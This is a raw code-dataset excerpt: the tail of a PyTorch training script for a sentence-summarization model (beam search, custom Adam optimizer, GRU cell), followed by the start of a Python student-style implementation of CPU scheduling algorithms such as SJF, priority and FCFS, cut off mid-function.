self.tgt_dict = dataset['dicts']['tgt']\n\n self.enc_rnn_size = opt.enc_rnn_size\n self.dec_rnn_size = opt.dec_rnn_size\n self.opt.cuda = True if len(opt.gpus) >= 1 else False\n self.opt.n_best = 1\n self.opt.replace_unk = False\n\n self.tt = torch.cuda if opt.cuda else torch\n self.model = model\n self.model.eval()\n\n self.copyCount = 0\n\n def buildData(self, srcBatch, goldBatch):\n srcData = [self.src_dict.convertToIdx(b, UNK_WORD) for b in srcBatch]\n tgtData = None\n if goldBatch:\n tgtData = [self.tgt_dict.convertToIdx(b, UNK_WORD, BOS_WORD, EOS_WORD) for b in goldBatch]\n\n return Dataset(srcData, tgtData, self.opt.batch_size, self.opt.cuda, volatile=True)\n\n def buildTargetTokens(self, pred, src, attn):\n tokens = self.tgt_dict.convertToLabels(pred, EOS)\n tokens = tokens[:-1] # EOS\n if self.opt.replace_unk:\n for i in range(len(tokens)):\n if tokens[i] == UNK_WORD:\n _, maxIndex = attn[i].max(0)\n tokens[i] = src[maxIndex[0]]\n return tokens\n\n def translateBatch(self, srcBatch, tgtBatch):\n batchSize = srcBatch[0].size(1)\n beamSize = self.opt.beam_size\n\n # (1) run the encoder on the src\n encStates, context = self.model.encoder(srcBatch)\n srcBatch = srcBatch[0] # drop the lengths needed for encoder\n\n decStates = self.model.decIniter(encStates[1]) # batch, dec_hidden\n\n # (3) run the decoder to generate sentences, using beam search\n\n # Expand tensors for each beam.\n context = Variable(context.data.repeat(1, beamSize, 1))\n decStates = Variable(decStates.unsqueeze(0).data.repeat(1, beamSize, 1))\n att_vec = self.model.make_init_att(context)\n padMask = Variable(\n srcBatch.data.eq(PAD).transpose(0, 1).unsqueeze(0).repeat(beamSize, 1, 1).float(),\n volatile=True)\n\n beam = [Beam(beamSize, self.opt.cuda) for k in range(batchSize)]\n batchIdx = list(range(batchSize))\n remainingSents = batchSize\n\n for i in range(self.opt.max_sent_length):\n # Prepare decoder input.\n input = torch.stack([b.getCurrentState() for b in beam\n if not b.done]).transpose(0, 1).contiguous().view(1, -1)\n g_outputs, decStates, attn, att_vec = self.model.decoder(\n Variable(input, volatile=True), decStates, context, padMask.view(-1, padMask.size(2)), att_vec)\n\n # g_outputs: 1 x (beam*batch) x numWords\n g_outputs = 
g_outputs.squeeze(0)\n g_out_prob = self.model.generator.forward(g_outputs)\n\n # batch x beam x numWords\n wordLk = g_out_prob.view(beamSize, remainingSents, -1).transpose(0, 1).contiguous()\n attn = attn.view(beamSize, remainingSents, -1).transpose(0, 1).contiguous()\n\n active = []\n father_idx = []\n for b in range(batchSize):\n if beam[b].done:\n continue\n\n idx = batchIdx[b]\n if not beam[b].advance(wordLk.data[idx], attn.data[idx]):\n active += [b]\n father_idx.append(beam[b].prevKs[-1]) # this is very annoying\n\n if not active:\n break\n\n # to get the real father index\n real_father_idx = []\n for kk, idx in enumerate(father_idx):\n real_father_idx.append(idx * len(father_idx) + kk)\n\n # in this section, the sentences that are still active are\n # compacted so that the decoder is not run on completed sentences\n activeIdx = self.tt.LongTensor([batchIdx[k] for k in active])\n batchIdx = {beam: idx for idx, beam in enumerate(active)}\n\n def updateActive(t, rnnSize):\n # select only the remaining active sentences\n view = t.data.view(-1, remainingSents, rnnSize)\n newSize = list(t.size())\n newSize[-2] = newSize[-2] * len(activeIdx) // remainingSents\n return Variable(view.index_select(1, activeIdx) \\\n .view(*newSize), volatile=True)\n\n decStates = updateActive(decStates, self.dec_rnn_size)\n context = updateActive(context, self.enc_rnn_size)\n att_vec = updateActive(att_vec, self.enc_rnn_size)\n padMask = padMask.index_select(1, Variable(activeIdx, volatile=True))\n\n # set correct state for beam search\n previous_index = torch.stack(real_father_idx).transpose(0, 1).contiguous()\n previous_index = Variable(previous_index, volatile=True)\n decStates = decStates.view(-1, decStates.size(2)).index_select(0, previous_index.view(-1)).view(\n *decStates.size())\n att_vec = att_vec.view(-1, att_vec.size(1)).index_select(0, previous_index.view(-1)).view(*att_vec.size())\n\n remainingSents = len(active)\n\n # (4) package everything up\n allHyp, allScores, allAttn = [], [], []\n n_best = self.opt.n_best\n\n for b in range(batchSize):\n scores, ks = beam[b].sortBest()\n\n allScores += [scores[:n_best]]\n valid_attn = srcBatch.data[:, b].ne(PAD).nonzero().squeeze(1)\n hyps, attn = zip(*[beam[b].getHyp(k) for k in ks[:n_best]])\n attn = [a.index_select(1, valid_attn) for a in attn]\n allHyp += [hyps]\n allAttn += [attn]\n\n return allHyp, allScores, allAttn, None\n\n def translate(self, srcBatch, goldBatch):\n # (1) convert words to indexes\n dataset = self.buildData(srcBatch, goldBatch)\n # (wrap(srcBatch), lengths), (wrap(tgtBatch), ), indices\n src, tgt, indices = dataset[0]\n\n # (2) translate\n pred, predScore, attn, _ = self.translateBatch(src, tgt)\n pred, predScore, attn = list(zip(\n *sorted(zip(pred, predScore, attn, indices),\n key=lambda x: x[-1])))[:-1]\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(src[0].size(1)):\n predBatch.append(\n [self.buildTargetTokens(pred[b][n], srcBatch[b], attn[b][n])\n for n in range(self.opt.n_best)]\n )\n\n return predBatch, predScore, None\n\n\nclass MyAdam(Optimizer):\n \"\"\"Implements Adam algorithm.\n\n It has been proposed in `Adam: A Method for Stochastic Optimization`_.\n\n Arguments:\n params (iterable): iterable of parameters to optimize or dicts defining\n parameter groups\n lr (float, optional): learning rate (default: 1e-3)\n betas (Tuple[float, float], optional): coefficients used for computing\n running averages of gradient and its square (default: (0.9, 0.999))\n eps (float, optional): term added to the 
denominator to improve\n numerical stability (default: 1e-8)\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\n\n .. _Adam\\: A Method for Stochastic Optimization:\n https://arxiv.org/abs/1412.6980\n \"\"\"\n\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0):\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay)\n super(MyAdam, self).__init__(params, defaults)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data\n state = self.state[p]\n\n # State initialization\n if len(state) == 0:\n state['step'] = 0\n # Exponential moving average of gradient values\n state['exp_avg'] = grad.new().resize_as_(grad).zero_()\n # Exponential moving average of squared gradient values\n state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n if group['weight_decay'] != 0:\n grad = grad.add(group['weight_decay'], p.data)\n\n # Decay the first and second moment running average coefficient\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n denom = exp_avg_sq.sqrt().add_(group['eps'] * math.sqrt(bias_correction2))\n step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1\n\n p.data.addcdiv_(-step_size, exp_avg, denom)\n\n return loss\n\n\nclass MyGRU(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(MyGRU, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.linear_input = nn.Linear(input_size, 3 * hidden_size, bias=True)\n self.linear_hidden = nn.Linear(hidden_size, 3 * hidden_size, bias=False)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n\n def forward(self, input, hidden, mask=None):\n x_W = self.linear_input(input)\n h_U = self.linear_hidden(hidden)\n x_Ws = x_W.split(self.hidden_size, 1)\n h_Us = h_U.split(self.hidden_size, 1)\n r = self.sigmoid(x_Ws[0] + h_Us[0])\n z = self.sigmoid(x_Ws[1] + h_Us[1])\n h1 = self.tanh(x_Ws[2] + r * h_Us[2])\n h = (h1 - hidden) * z + hidden\n if mask is not None:\n h = (h - hidden) * mask.unsqueeze(1).expand_as(hidden) + hidden\n return h\n\n def __repr__(self):\n return self.__class__.__name__ + '({0}, {1})'.format(self.input_size, self.hidden_size)\n\n\nclass Optim(object):\n def set_parameters(self, params):\n self.params = list(params) # careful: params may be a generator\n if self.method == 'sgd':\n self.optimizer = optim.SGD(self.params, lr=self.lr)\n elif self.method == 'adagrad':\n self.optimizer = optim.Adagrad(self.params, lr=self.lr)\n elif self.method == 'adadelta':\n self.optimizer = optim.Adadelta(self.params, lr=self.lr)\n elif self.method == 'adam':\n # self.optimizer = optim.Adam(self.params, lr=self.lr)\n self.optimizer = MyAdam(self.params, lr=self.lr)\n else:\n raise RuntimeError(\"Invalid optim method: \" + self.method)\n\n def __init__(self, method, lr, max_grad_norm, max_weight_value=None, lr_decay=1, start_decay_at=None,\n decay_bad_count=6):\n self.last_ppl = None\n self.lr = lr\n self.max_grad_norm = max_grad_norm\n 
self.max_weight_value = max_weight_value\n self.method = method\n self.lr_decay = lr_decay\n self.start_decay_at = start_decay_at\n self.start_decay = False\n self.decay_bad_count = decay_bad_count\n self.best_metric = 0\n self.bad_count = 0\n\n def step(self):\n # Compute gradients norm.\n if self.max_grad_norm:\n clip_grad_norm(self.params, self.max_grad_norm)\n self.optimizer.step()\n if self.max_weight_value:\n for p in self.params:\n p.data.clamp_(0 - self.max_weight_value, self.max_weight_value)\n\n # decay learning rate if val perf does not improve or we hit the start_decay_at limit\n def updateLearningRate(self, ppl, epoch):\n # if self.start_decay_at is not None and epoch >= self.start_decay_at:\n # self.start_decay = True\n # if self.last_ppl is not None and ppl > self.last_ppl:\n # self.start_decay = True\n #\n # if self.start_decay:\n # self.lr = self.lr * self.lr_decay\n # print(\"Decaying learning rate to %g\" % self.lr)\n\n # self.last_ppl = ppl\n if ppl >= self.best_metric:\n self.best_metric = ppl\n self.bad_count = 0\n else:\n self.bad_count += 1\n logger.info('Bad_count: {0}\\tCurrent lr: {1}'.format(self.bad_count, self.lr))\n logger.info('Best metric: {0}'.format(self.best_metric))\n\n if self.bad_count >= self.decay_bad_count and self.lr >= 1e-6:\n self.lr = self.lr * self.lr_decay\n logger.info(\"Decaying learning rate to %g\" % self.lr)\n self.bad_count = 0\n self.optimizer.param_groups[0]['lr'] = self.lr\n\n\ndef main():\n seq_length = opt.max_sent_length\n shuffle = 1 if opt.process_shuffle else 0\n dataset = prepare_data_online(opt.train_src, opt.src_vocab, opt.train_tgt, opt.tgt_vocab)\n\n trainData = Dataset(dataset['train']['src'], dataset['train']['tgt'], opt.batch_size, opt.gpus)\n dicts = dataset['dicts']\n logger.info(' * vocabulary size. source = %d; target = %d' %\n (dicts['src'].size(), dicts['tgt'].size()))\n logger.info(' * number of training sentences. %d' %\n len(dataset['train']['src']))\n logger.info(' * maximum batch size. 
%d' % opt.batch_size)\n\n logger.info('Building model...')\n\n encoder = Encoder(opt, dicts['src'])\n decoder = Decoder(opt, dicts['tgt'])\n decIniter = DecInit(opt)\n\n generator = nn.Sequential(\n nn.Linear(opt.dec_rnn_size // opt.maxout_pool_size, dicts['tgt'].size()), # TODO: fix here\n nn.LogSoftmax())\n\n model = NMTModel(encoder, decoder, decIniter)\n model.generator = generator\n translator = Translator(opt, model, dataset)\n\n if len(opt.gpus) >= 1:\n model.cuda()\n generator.cuda()\n else:\n model.cpu()\n generator.cpu()\n\n for pr_name, p in model.named_parameters():\n logger.info(pr_name)\n # p.data.uniform_(-opt.param_init, opt.param_init)\n if p.dim() == 1:\n # p.data.zero_()\n p.data.normal_(0, math.sqrt(6 / (1 + p.size(0))))\n else:\n xavier_normal(p, math.sqrt(3))\n # xavier_uniform(p)\n\n encoder.load_pretrained_vectors(opt)\n decoder.load_pretrained_vectors(opt)\n\n optim = Optim(\n opt.optim, opt.learning_rate,\n max_grad_norm=opt.max_grad_norm,\n max_weight_value=opt.max_weight_value,\n lr_decay=opt.learning_rate_decay,\n start_decay_at=opt.start_decay_at,\n decay_bad_count=opt.halve_lr_bad_count\n )\n\n optim.set_parameters(model.parameters())\n\n validData = None\n if opt.dev_input_src and opt.dev_ref:\n validData = load_dev_data(translator, opt.dev_input_src, opt.dev_ref)\n trainModel(model, translator, trainData, validData, dataset, optim)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"SEASS/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":75335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
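# Editor's note: a minimal sketch (not part of the original record) of the Adam
# update rule that the MyAdam optimizer above implements; the names m, v and g are
# illustrative. MyAdam folds math.sqrt(bias_correction2) into the denominator,
# which is algebraically equivalent to the textbook form written out here.
import math

def adam_step(p, g, m, v, t, lr=1e-3, beta1=0.9, beta2=0.999, eps=1e-8):
    """One Adam step for a scalar parameter p with gradient g at step t >= 1."""
    m = beta1 * m + (1 - beta1) * g        # running mean of gradients
    v = beta2 * v + (1 - beta2) * g * g    # running mean of squared gradients
    m_hat = m / (1 - beta1 ** t)           # bias-corrected first moment
    v_hat = v / (1 - beta2 ** t)           # bias-corrected second moment
    return p - lr * m_hat / (math.sqrt(v_hat) + eps), m, v

# Example: a few steps on f(p) = p**2, whose gradient is 2*p.
p, m, v = 1.0, 0.0, 0.0
for t in range(1, 4):
    p, m, v = adam_step(p, 2 * p, m, v, t)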
+{"seq_id":"596622323","text":"import operator\r\ndef priority(elem):\r\n return elem[3]\r\ndef arrivaltime(elem):\r\n return elem[1]\r\ndef BurstTime(elem):\r\n return elem[2]\r\n\r\n################################################ Non-Preemptive SJF #################################\r\nclass SJF:\r\n\r\n def processData(self, no_of_processes):\r\n process_data = []\r\n for i in range(no_of_processes):\r\n temporary = []\r\n process_id = int(input(\"Enter Process ID: \"))\r\n\r\n arrival_time = int(input(f\"Enter Arrival Time for Process {process_id}: \"))\r\n\r\n burst_time = int(input(f\"Enter Burst Time for Process {process_id}: \"))\r\n temporary.extend([process_id, arrival_time, burst_time, 0])\r\n '''\r\n '0' is the state of the process. 0 means not executed and 1 means execution complete\r\n '''\r\n process_data.append(temporary)\r\n SJF.schedulingProcess(self, process_data)\r\n\r\n def schedulingProcess(self, process_data):\r\n start_time = []\r\n exit_time = []\r\n s_time = 0\r\n process_data.sort(key=lambda x: x[1])\r\n '''\r\n Sort processes according to the Arrival Time\r\n '''\r\n for i in range(len(process_data)):\r\n ready_queue = []\r\n temp = []\r\n normal_queue = []\r\n '''\r\n # if current time less than or equal arrival time of the process put it in the ready queue \r\n else put it in the normal queue\r\n '''\r\n\r\n for j in range(len(process_data)):\r\n if (process_data[j][1] <= s_time) and (process_data[j][3] == 0):\r\n temp.extend([process_data[j][0], process_data[j][1], process_data[j][2]])\r\n ready_queue.append(temp)\r\n temp = []\r\n elif process_data[j][3] == 0:\r\n temp.extend([process_data[j][0], process_data[j][1], process_data[j][2]])\r\n normal_queue.append(temp)\r\n temp = [] #\r\n\r\n if len(ready_queue) != 0:\r\n ready_queue.sort(key=lambda x: x[2])\r\n '''\r\n Sort the processes according to the Burst Time\r\n '''\r\n start_time.append(s_time)\r\n s_time = s_time + ready_queue[0][2]\r\n e_time = s_time\r\n exit_time.append(e_time)\r\n for k in range(len(process_data)):\r\n if process_data[k][0] == ready_queue[0][0]:\r\n break\r\n process_data[k][3] = 1\r\n process_data[k].append(e_time)\r\n\r\n elif len(ready_queue) == 0:\r\n if s_time < normal_queue[0][1]:\r\n s_time = normal_queue[0][1]\r\n start_time.append(s_time)\r\n s_time = s_time + normal_queue[0][2]\r\n e_time = s_time\r\n exit_time.append(e_time)\r\n for k in range(len(process_data)): # lw process excuted change status from 0 to 1\r\n if process_data[k][0] == normal_queue[0][0]:\r\n break\r\n process_data[k][3] = 1\r\n process_data[k].append(e_time)\r\n\r\n t_time = SJF.calculateTurnaroundTime(self, process_data)\r\n w_time = SJF.calculateWaitingTime(self, process_data)\r\n SJF.printData(self, process_data, t_time, w_time)\r\n\r\n def calculateTurnaroundTime(self, process_data):\r\n total_turnaround_time = 0\r\n for i in range(len(process_data)):\r\n turnaround_time = process_data[i][4] - process_data[i][1]\r\n '''\r\n turnaround_time = completion_time - arrival_time\r\n '''\r\n total_turnaround_time = total_turnaround_time + turnaround_time\r\n process_data[i].append(turnaround_time)\r\n average_turnaround_time = total_turnaround_time / len(process_data)\r\n '''\r\n average_turnaround_time = total_turnaround_time / no_of_processes\r\n '''\r\n return average_turnaround_time\r\n\r\n def calculateWaitingTime(self, process_data):\r\n total_waiting_time = 0\r\n for i in range(len(process_data)):\r\n waiting_time = process_data[i][5] - process_data[i][2]\r\n '''\r\n waiting_time = turnaround_time 
- burst_time\r\n '''\r\n total_waiting_time = total_waiting_time + waiting_time\r\n process_data[i].append(waiting_time)\r\n average_waiting_time = total_waiting_time / len(process_data)\r\n '''\r\n average_waiting_time = total_waiting_time / no_of_processes\r\n '''\r\n return average_waiting_time\r\n\r\n '''\r\n def printData(self, process_data, average_turnaround_time, average_waiting_time):\r\n process_data.sort(key=lambda x: x[4])\r\n Sort processes according to the Process completion time\r\n headers = [\"Process ID\", \"Arrival Time\", \"Burst Time\", \"Completed\", \"Completion Time\", \"Turnaround_Time\", \"Waiting_Time\"]\r\n print(tabulate(process_data, headers=headers))\r\n print(f'Average Turnaround Time: {average_turnaround_time}')\r\n print(f'Average Waiting Time: {average_waiting_time}')\r\n '''\r\n\r\n def printData(self, process_data, average_turnaround_time, average_waiting_time):\r\n process_data.sort(key=lambda x: x[0])\r\n '''\r\n Sort processes according to the Process ID\r\n '''\r\n print(\"Process_ID Arrival_Time Burst_Time Completed Completion_Time Turnaround_Time Waiting_Time\")\r\n\r\n for i in range(len(process_data)):\r\n for j in range(len(process_data[i])):\r\n print(process_data[i][j], end=\"\t\t\t\t\")\r\n print()\r\n\r\n #print(f'Average Turnaround Time: {average_turnaround_time}')\r\n\r\n print(f'Average Waiting Time: {average_waiting_time}')\r\n################################################ preemptive priority #################################\r\nMat = []\r\nglobal prearrival\r\nprearrival = []\r\nglobal current_running\r\ncurrent_running = []\r\ntemp = []\r\ndef PrioprocessCreate(processesNumber):\r\n number_of_columns = 4 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n temp.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n temp[i].append(j)\r\n temp[i][j] = 0\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done number\\n\")\r\ndef Prioinput(ProcessID, ArrivalTime, BurstTime, Priority):\r\n Mat[ProcessID - 1][0] = temp[ProcessID - 1][0] = ProcessID\r\n Mat[ProcessID - 1][1] = temp[ProcessID - 1][1] = ArrivalTime\r\n Mat[ProcessID - 1][2] = temp[ProcessID - 1][2] = BurstTime\r\n Mat[ProcessID - 1][3] = temp[ProcessID - 1][3] = Priority\r\n\r\n print(Mat[ProcessID - 1])\r\ndepsum = 0\r\ncurrent_running = []\r\ndef preemptive_priority(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 3))\r\n m_sum = 0\r\n for i in range(0, processesNumber):\r\n m_sum = m_sum + Mat[i][2]\r\n if i==processesNumber-1:\r\n if temp[i][1]> temp[i-1][1]+m_sum:\r\n m_sum = temp[i+1][1] -temp[i][1]\r\n else:\r\n if temp[i+1][1]> temp[i][1]+m_sum:\r\n m_sum = temp[i+1][1] -temp[i][1]\r\n depsum = m_sum\r\n\r\n waiting = []\r\n first = Mat[0]\r\n for i in range(0, processesNumber):\r\n if Mat[i][1] == first[1]:\r\n if Mat[i][3] < first[3]:\r\n first = Mat[i]\r\n\r\n current_running.append(first[0])\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n Mat[i][2] = Mat[i][2] - 1\r\n if Mat[i][2] == 0:\r\n del Mat[i]\r\n break\r\n m_sum = m_sum - 1\r\n start = 1\r\n\r\n\r\n\r\n for i in range(0 ,m_sum):\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] <= start:\r\n waiting.append(Mat[j])\r\n if len(waiting) == 0:\r\n if Mat[j][1] != start:\r\n 
current_running.append(\"IDLE\")\r\n\r\n else:\r\n first = Mat[0]\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] == first[1]:\r\n if Mat[j][3] < first[3]:\r\n first = Mat[j]\r\n current_running.append(first[0])\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n else:\r\n first = waiting[0]\r\n for j in range(0, len(waiting)):\r\n if waiting[j][3] < first[3]:\r\n first = waiting[j]\r\n waiting.clear()\r\n\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n current_running.append(first[0])\r\n\r\n m_sum = m_sum - 1\r\n start = start + 1\r\n\r\n current_running\r\n\r\ndef averagetime(processesNumber):\r\n waittime = []\r\n bursttime = []\r\n departure = []\r\n burst = 0\r\n firsttime = 0\r\n firstArrived = current_running[0]\r\n print(firstArrived)\r\n for i in range(0, len(temp)):\r\n if temp[i] == firstArrived:\r\n firsttime = temp[i][1]\r\n print(firsttime)\r\n for i in range(0, len(temp)):\r\n indexpos = 0\r\n indexPoslist = []\r\n prearrival.append(temp[i][1])\r\n bursttime.append(temp[i][2])\r\n for j in range(0, temp[i][2]):\r\n indexpos = current_running.index(temp[i][0], indexpos)\r\n indexPoslist.append(indexpos)\r\n indexpos += 1\r\n if i == 0:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1)\r\n else:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1 + firsttime)\r\n if prearrival[i] > prearrival[i-1] + bursttime[i-1]:\r\n waittime.append(0)\r\n else:\r\n waittime.append(departure[i] - prearrival[i] - bursttime[i])\r\n tim = 0\r\n for i in range(len(waittime)):\r\n tim = tim + waittime[i]\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n\r\n\r\n############################################################### FCFS ####################################\r\nMat = []\r\ndef FCFSprocessCreate(processesNumber):\r\n number_of_columns = 3 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done number\\n\")\r\ndef FCFS_input(name, ArrivalTime, BurstTime):\r\n Mat[name - 1][0] = name\r\n Mat[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = BurstTime\r\n\r\n print(Mat[name - 1])\r\n\r\n\r\nFCcurrent_running = []\r\nFCrunning = []\r\nProcessArrival = []\r\n\r\ndef FCFSburst(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n bursteach = []\r\n for i in range(len(ProcessArrival)):\r\n bursteach.append(ProcessArrival[i][2])\r\n return bursteach\r\n\r\ndef FCFS(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n for i in range(len(ProcessArrival)):\r\n if ProcessArrival[i][1] > ProcessArrival[i-1][1]+ProcessArrival[i-1][2]:\r\n FCcurrent_running.append(\"IDLE\")\r\n else:\r\n FCcurrent_running.append(\"P\" + str(ProcessArrival[i][0]))\r\n return FCcurrent_running\r\n\r\n\r\n\r\ndef FCaverage(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n arrival = []\r\n bursttime = []\r\n departure = []\r\n waittime = []\r\n dsum = 0\r\n\r\n for i in range(len(ProcessArrival)):\r\n arrival.append(ProcessArrival[i][1])\r\n bursttime.append(ProcessArrival[i][2])\r\n departure.append(ProcessArrival[i][2] + dsum)\r\n dsum = 
departure[i]\r\n tim = 0\r\n for i in range(processesNumber):\r\n tim = tim + (departure[i]-bursttime[i]-arrival[i])\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n\r\n\r\n\r\ndef FCreturnLeave(processesNumber):\r\n ProcessArrival = sorted(Mat, key=arrivaltime)\r\n arrival = []\r\n bursttime = []\r\n departure = []\r\n dsum = 0\r\n for i in range(len(ProcessArrival)):\r\n arrival.append(ProcessArrival[i][1])\r\n bursttime.append(ProcessArrival[i][2])\r\n departure.append(ProcessArrival[i][2] + dsum)\r\n dsum = departure[i]\r\n\r\n return departure\r\n\r\n############################################# preemptive SJF #######################################\r\n\r\nglobal PreSJFtemp\r\nPreSJFtemp = []\r\nglobal SJprecurrent_running\r\nSJprecurrent_running = []\r\nMat = []\r\nglobal SJFprearrival\r\nSJFprearrival = []\r\ndef processCreate(processesNumber):\r\n number_of_columns = 3 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n PreSJFtemp.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n PreSJFtemp[i].append(j)\r\n PreSJFtemp[i][j] = 0\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i in range(0, processesNumber):\r\n for j in range(0, number_of_columns):\r\n Mat[i].append(j)\r\n Mat[i][j] = 0\r\n print(\"Done Number\\n\")\r\n\r\ndef pre_sjf_input(name, ArrivalTime, BurstTime):\r\n Mat[name - 1][0] = PreSJFtemp[name - 1][0] = name\r\n Mat[name - 1][1] = PreSJFtemp[name - 1][1] = ArrivalTime\r\n Mat[name - 1][2] = PreSJFtemp[name - 1][2] = BurstTime\r\n\r\n print(Mat[name - 1])\r\n\r\n\r\n\r\n\r\ndef preemptive_sjf(processesNumber):\r\n Mat.sort(key=operator.itemgetter(1, 2))\r\n m_sum = 0\r\n for i in range(0, processesNumber):\r\n m_sum = m_sum + Mat[i][2]\r\n if i==processesNumber-1:\r\n if PreSJFtemp[i][1] > PreSJFtemp[i-1][1]+m_sum:\r\n m_sum = PreSJFtemp[i+1][1] -PreSJFtemp[i][1]\r\n else:\r\n if PreSJFtemp[i+1][1] > PreSJFtemp[i][1]+m_sum:\r\n m_sum = PreSJFtemp[i+1][1] - PreSJFtemp[i][1]\r\n waiting = []\r\n first = Mat[0]\r\n for i in range(0, processesNumber):\r\n if Mat[i][1] == first[1]:\r\n if Mat[i][2] < first[2]:\r\n first = Mat[i]\r\n\r\n SJprecurrent_running.append(first[0])\r\n for i in range(0, len(Mat)):\r\n if Mat[i] == first:\r\n Mat[i][2] = Mat[i][2] - 1\r\n if Mat[i][2] == 0:\r\n del Mat[i]\r\n break\r\n m_sum = m_sum - 1\r\n start = 1\r\n\r\n for i in range(0, m_sum):\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] <= start:\r\n waiting.append(Mat[j])\r\n if len(waiting) == 0:\r\n if Mat[j][1] != start:\r\n SJprecurrent_running.append(\"IDLE\")\r\n else:\r\n first = Mat[0]\r\n for j in range(0, len(Mat)):\r\n if Mat[j][1] == first[1]:\r\n if Mat[j][2] < first[2]:\r\n first = Mat[j]\r\n SJprecurrent_running.append(first[0])\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n else:\r\n first = waiting[0]\r\n for j in range(0, len(waiting)):\r\n if waiting[j][2] < first[2]:\r\n first = waiting[j]\r\n waiting.clear()\r\n\r\n for q in range(0, len(Mat)):\r\n if Mat[q][0] == first[0]:\r\n Mat[q][2] = Mat[q][2] - 1\r\n if Mat[q][2] == 0:\r\n del Mat[q]\r\n break\r\n SJprecurrent_running.append(first[0])\r\n m_sum = m_sum - 1\r\n start = start + 1\r\n\r\n\r\n\r\n\r\ndef 
SJaveragetime(processesNumber):\r\n waittime = []\r\n bursttime = []\r\n departure = []\r\n burst = 0\r\n firsttime = 0\r\n firstArrived = SJprecurrent_running[0]\r\n print(firstArrived)\r\n for i in range(0, len(PreSJFtemp)):\r\n if PreSJFtemp[i][0] == firstArrived:\r\n firsttime = PreSJFtemp[i][1]\r\n print(firsttime)\r\n for i in range(0, len(PreSJFtemp)):\r\n indexpos = 0\r\n indexPoslist = []\r\n SJFprearrival.append(PreSJFtemp[i][1])\r\n bursttime.append(PreSJFtemp[i][2])\r\n for j in range(0, PreSJFtemp[i][2]):\r\n indexpos = SJprecurrent_running.index(PreSJFtemp[i][0], indexpos)\r\n indexPoslist.append(indexpos)\r\n indexpos += 1\r\n if i == 0:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1)\r\n else:\r\n departure.append(indexPoslist[len(indexPoslist) - 1] + 1 + firsttime)\r\n if SJFprearrival[i] > SJFprearrival[i - 1] + bursttime[i - 1]:\r\n waittime.append(0)\r\n else:\r\n waittime.append(departure[i] - SJFprearrival[i] - bursttime[i])\r\n tim = 0\r\n for i in range(len(waittime)):\r\n tim = tim + waittime[i]\r\n averageTime = tim / processesNumber\r\n if processesNumber == 1:\r\n averageTime = 0\r\n return averageTime\r\n else:\r\n return averageTime\r\n\r\n#################################### non-preemptive priority ##########################################\r\nMat = []\r\nwaitingList = []\r\nstartingList = []\r\nglobal currentRunning\r\ncurrentRunning = []\r\nglobal GanttInformation\r\nGanttInformation = []\r\nxcurrent_running = []\r\ndef NonPrioprocessCreate(processesNumber):\r\n number_of_columns = 4 # number of columns of matrix\r\n for i in range(0, processesNumber):\r\n Mat.append([]) # Create rows in list , row for each process\r\n for i 